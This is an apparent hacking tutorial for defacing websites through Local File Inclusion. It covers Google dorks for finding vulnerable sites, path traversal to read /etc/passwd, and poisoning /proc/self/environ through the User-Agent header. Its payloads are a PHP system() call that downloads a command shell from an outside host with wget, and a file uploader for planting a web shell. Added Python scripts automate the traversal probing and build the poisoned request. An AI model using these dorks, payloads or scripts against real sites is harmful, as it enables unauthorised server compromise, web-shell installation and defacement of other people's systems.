Deface PoC: Local File Inclusion (LFI)

This time we'll go over a proof of concept that is already pretty old: Local File Inclusion (LFI). Without further ado, straight to the target, let's go.

For this tutorial we only need two tools:

● Mozilla Firefox browser

● The Tamper Data add-on


Google dorks:

  • inurl:/view/lang/index.php?page=?page=
  • inurl:/shared/help.php?page=
  • inurl:.php?page=contact.php

Expand on these yourselves.
First, run a basic check of whether the site is vulnerable to LFI. If it is, move straight on to the next steps.

Start from a normal page include:

  • localhost/view.php?page=email.php

Now replace email.php with ../../ :

  • localhost/view.php?page=../../

If you get an error like this:

Warning: include(../../) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

then the page parameter goes straight into include(), which means we can pull in more sensitive local files.
Let's try calling /etc/passwd:

  • localhost/view.php?page=etc/passwd

Still an error?

Warning: include(etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/hackers/public_html/view.php on line 1337

Then climb up the directory tree:

  • localhost/view.php?page=../../../../../etc/passwd

If it still errors, keep adding ../ until /etc/passwd is read. Overshooting is harmless: on Linux, ../ above / simply stays at /, so a path with too many ../ still resolves to /etc/passwd.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

Boom!
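The "keep adding ../ until it reads" step above is easy to automate. The following is an added example, not code from the original post: probe_lfi() raises the traversal depth until the response carries a marker from the target file, and classify_response() separates the three outcomes the walkthrough describes (file read, an include() warning meaning the path reaches include() but is wrong, and nothing useful). No real server is contacted: fake_target() is a constructed stand-in for the vulnerable view.php (document root /home/hackers/public_html, a bare include($_GET['page'])), and its sample files are constructed. For a real target, pass probe_lfi() a fetch function built on requests or urllib that returns the body for ?page=<value>.

```python
import posixpath

INCLUDE_WARNING = "failed to open stream"


def classify_response(body, marker):
    """Sort a response into the three outcomes the walkthrough describes."""
    if marker in body:
        return "read"          # the target file came back
    if INCLUDE_WARNING in body:
        return "warning"       # include() ran on our path, but the path was wrong
    return "nothing"           # no sign the parameter reaches include()


def traversal_path(depth, target):
    """'../' * depth followed by the target without its leading slash."""
    return "../" * depth + target.lstrip("/")


def probe_lfi(fetch, target="etc/passwd", marker="root:x:0:0", max_depth=12):
    """Try depth 0..max_depth and return (depth, status).

    fetch(page) must return the response body for ?page=<page>.
    status is 'read' with the first depth that worked; otherwise 'warning'
    (include() is reachable but the file never came back: wrong target,
    open_basedir, or file permissions) or 'nothing'.
    """
    saw_warning = False
    for depth in range(max_depth + 1):
        status = classify_response(fetch(traversal_path(depth, target)), marker)
        if status == "read":
            return depth, "read"
        saw_warning = saw_warning or status == "warning"
    return None, "warning" if saw_warning else "nothing"


# ---- constructed stand-in for the vulnerable target (no real server) ----
SCRIPT_DIR = "/home/hackers/public_html"          # DOCUMENT_ROOT from the post
FAKE_FS = {                                        # constructed sample files
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "bin:x:1:1:bin:/bin:/sbin/nologin\n",
    SCRIPT_DIR + "/email.php": "<h1>Contact</h1>",
}


def fake_target(page):
    """Model of view.php doing include($_GET['page']).

    Simplification: a relative path is resolved against the script's own
    directory only (real PHP also consults include_path). posixpath.normpath
    keeps '..' above '/' at '/', which is why overshooting the depth still
    lands on /etc/passwd.
    """
    resolved = posixpath.normpath(posixpath.join(SCRIPT_DIR, page))
    if resolved in FAKE_FS:
        return FAKE_FS[resolved]
    return ("Warning: include(%s) [function.include]: failed to open stream: "
            "No such file or directory in %s/view.php on line 1337"
            % (page, SCRIPT_DIR))


if __name__ == "__main__":
    print(probe_lfi(fake_target))   # (3, 'read')
```

If every depth comes back as "warning", the include is reachable but the target is not: try a file the web server user can certainly read, and keep in mind open_basedir restrictions before concluding the site is not exploitable.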

Now let's check whether /proc/self/environ can be read:

  • localhost/view.php?page=../../../../../proc/self/environ

DOCUMENT_ROOT=/home/hackers/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif,
image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t13371b341231b94r1844ac2ad7ac
HTTP_HOST=localhost HTTP_REFERER=http://localhost/view.php?page=../../../../../etc/passwd
HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2015102815 Ubuntu/9.04 (trusty) Firefox/5.0.15
PATH=/bin:/usr/bin QUERY_STRING=page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200 REMOTE_ADDR=127.0.0.1 REMOTE_PORT=1337
REQUEST_METHOD=GET REQUEST_URI=/view.php?page=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/hackers/public_html/view.php SCRIPT_NAME=/view.php
SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=hackers@site.com SERVER_NAME=localhost
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k
PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at localhost Port 80

The request headers (HTTP_USER_AGENT and friends) show up in the environment, so the site can be injected. If the page comes back blank, or shows only the server's own environment with no HTTP_* variables, it can't: the trick depends on PHP running as a per-request CGI process, which is what exports the request headers into the process environment (the GATEWAY_INTERFACE=CGI/1.1 and REDIRECT_STATUS lines above are the tell); mod_php and php-fpm don't put them there.
Next, enable Tamper Data.
Load localhost/view.php?page=../../../../../proc/self/environ
Then start tampering.
In the User-Agent field in Tamper Data, enter the following (use the full <?php tag; the short <? form only works when short_open_tag is enabled):

<?php system('wget http://yuyudhn1337.org/exp/cmdshell.txt -O fvck.php'); ?>

Then submit.

Your shell will be at the name you gave to -O, written next to view.php:

  • localhost/fvck.php

In some cases the system() function is disabled on the server (disable_functions), so the wget trick above won't work.
But there's another way.
In the User-Agent, enter this uploader script instead:

<!-- copy() moves the uploaded temp file to a file with the upload's own name, next to the including script -->
<?php @copy($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>
<h1>shu</h1>
<form action="" method="post" enctype="multipart/form-data">
Filename: <input type="file" name="file" /><input type="submit" value="Submit" /><br>
</form>

After the upload, the shell sits where copy() wrote it: the working directory of the including script, which here is the document root of the domain.
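Both the wget route and the uploader route above are the same request: a GET for /proc/self/environ via the vulnerable parameter, with PHP in the User-Agent header. The following is an added example, not code from the original post, that does the Tamper Data step with a script. parse_environ() reads the file as the kernel serves it (NUL-separated KEY=VALUE entries; the browser rendered those NULs as spaces in the dump above), environ_is_poisonable() checks that request headers actually land in it, depth_from_script() reads the needed number of ../ off SCRIPT_FILENAME, and poison_request() builds the poisoned GET without sending it. The base URL, parameter name and sample environ are constructed from the post's walkthrough; the payload strings are the post's two payloads.

```python
import posixpath
import urllib.request
from urllib.parse import urlencode, urlsplit, urlunsplit


def parse_environ(raw):
    """Parse /proc/self/environ: KEY=VALUE entries separated by NUL bytes.

    Values such as HTTP_USER_AGENT contain spaces, so the raw bytes must be
    split on b'\\0', never on whitespace as a browser rendering suggests.
    """
    env = {}
    for entry in raw.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("latin-1")] = value.decode("latin-1")
    return env


def environ_is_poisonable(env):
    """True when request headers are exported into the process environment.

    That is the case when PHP runs as a per-request CGI process
    (GATEWAY_INTERFACE in the dump is the usual tell). Under mod_php or
    php-fpm the file shows the server's own environment with no HTTP_* keys,
    so a payload in User-Agent never reaches it.
    """
    return "HTTP_USER_AGENT" in env and "GATEWAY_INTERFACE" in env


def depth_from_script(env):
    """Number of ../ needed to reach / from the including script's directory,
    read straight from SCRIPT_FILENAME instead of found by trial and error."""
    script_dir = posixpath.dirname(env["SCRIPT_FILENAME"])
    return len([p for p in script_dir.split("/") if p])


# Payloads from the post (full <?php tag so short_open_tag does not matter).
WGET_PAYLOAD = ("<?php system('wget http://yuyudhn1337.org/exp/cmdshell.txt "
                "-O fvck.php'); ?>")
UPLOADER_PAYLOAD = (
    "<?php @copy($_FILES['file']['tmp_name'], $_FILES['file']['name']); ?>"
    '<form method="post" enctype="multipart/form-data">'
    '<input type="file" name="file"><input type="submit" value="Submit"></form>'
)


def poison_request(base_url, param, depth, payload):
    """Build (not send) the GET that includes /proc/self/environ while the
    PHP payload rides in User-Agent, the same thing Tamper Data does by hand."""
    traversal = "../" * depth + "proc/self/environ"
    parts = urlsplit(base_url)
    url = urlunsplit(parts._replace(query=urlencode({param: traversal})))
    return urllib.request.Request(url, headers={"User-Agent": payload})


# Constructed sample, NUL-separated as the kernel serves it, based on the
# post's dump (assumed values, not a capture).
SAMPLE_ENVIRON = (
    b"DOCUMENT_ROOT=/home/hackers/public_html\0"
    b"GATEWAY_INTERFACE=CGI/1.1\0"
    b"HTTP_HOST=localhost\0"
    b"HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US) Firefox\0"
    b"REDIRECT_STATUS=200\0"
    b"REQUEST_URI=/view.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron\0"
    b"SCRIPT_FILENAME=/home/hackers/public_html/view.php\0"
)

if __name__ == "__main__":
    env = parse_environ(SAMPLE_ENVIRON)
    if environ_is_poisonable(env):
        req = poison_request("http://localhost/view.php", "page",
                             depth_from_script(env), WGET_PAYLOAD)
        print(req.full_url)
        print(req.get_header("User-agent"))
        # urllib.request.urlopen(req) would send it; only built here.
```

Note that the header value is sent exactly as given: the multi-line uploader form from the post must be collapsed onto one line, as UPLOADER_PAYLOAD is, because a line break ends the header.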
